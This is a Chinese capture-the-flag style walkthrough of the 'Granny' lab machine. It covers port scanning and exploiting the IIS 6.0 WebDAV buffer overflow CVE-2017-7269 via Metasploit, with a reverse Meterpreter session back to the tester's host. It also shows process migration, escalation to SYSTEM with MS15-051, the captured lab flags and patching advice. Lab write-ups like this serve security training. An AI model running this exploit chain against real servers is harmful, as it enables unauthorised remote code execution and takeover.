[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程迁移+MS15-051权限提升
字数 1205 2025-08-19 12:41:39
IIS 6.0漏洞利用与权限提升完整指南
1. 信息收集阶段
1.1 初始扫描
使用Nmap进行端口扫描和服务识别:
nmap -p- 10.10.10.15 --min-rate 1000 -sC -sV -Pn
扫描结果分析:
- 开放端口:TCP 80
- 服务:Microsoft IIS httpd 6.0
- WebDAV检测:
- 允许的方法:OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
- 潜在危险方法:TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
1.2 WebDAV配置分析
关键发现:
- 服务器类型:Microsoft-IIS/6.0
- 公共选项:OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
- 服务器日期:Thu, 22 Aug 2024 07:28:25 GMT
2. 漏洞利用阶段
2.1 CVE-2017-7269利用
使用Metasploit框架进行利用:
- 启动Metasploit:
msfconsole
- 选择漏洞利用模块:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
- 配置参数:
set RHOSTS 10.10.10.15
set LHOST 10.10.16.24
- 执行攻击:
run
成功后会获得Meterpreter会话。
2.2 会话管理
将Meterpreter会话放入后台:
bg
3. 权限提升阶段
3.1 本地漏洞检测
使用Metasploit的本地漏洞检测模块:
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
3.2 进程迁移
为确保稳定性,将进程迁移到davcdata.exe:
migrate 2732
3.3 MS15-051权限提升
- 选择漏洞利用模块:
use exploit/windows/local/ms15_051_client_copy_image
- 配置参数:
set LHOST 10.10.16.24
set SESSION 1
- 执行权限提升:
run
4. 后渗透阶段
4.1 获取用户标志
User.txt: 700c5dc163014e22b3e408f8703f67d1
4.2 获取系统标志
Root.txt: aa4beed1c0584445ab463a6747bd06e9
5. 技术要点总结
-
IIS 6.0 WebDAV漏洞(CVE-2017-7269):
- 影响Microsoft IIS 6.0版本
- 通过精心构造的PROPFIND请求触发缓冲区溢出
- 允许远程代码执行
-
MS15-051客户端复制映像漏洞:
- Windows内核模式驱动漏洞
- 允许本地用户提升权限
- 影响Windows Server 2003 SP2等系统
-
进程迁移技术:
- 将Meterpreter会话迁移到更稳定的进程
- 本例中迁移到davcdata.exe(WebDAV组件进程)
- 避免因IIS进程回收导致会话丢失
-
Metasploit框架使用技巧:
- 模块链式调用
- 会话后台管理
- 本地漏洞自动检测
6. 防御建议
-
对于IIS 6.0:
- 升级到更高版本
- 禁用WebDAV扩展
- 限制HTTP方法,仅保留必要方法
-
对于MS15-051:
- 应用微软安全补丁KB3057191
- 限制本地用户权限
-
通用防御措施:
- 定期更新系统补丁
- 实施最小权限原则
- 监控异常进程行为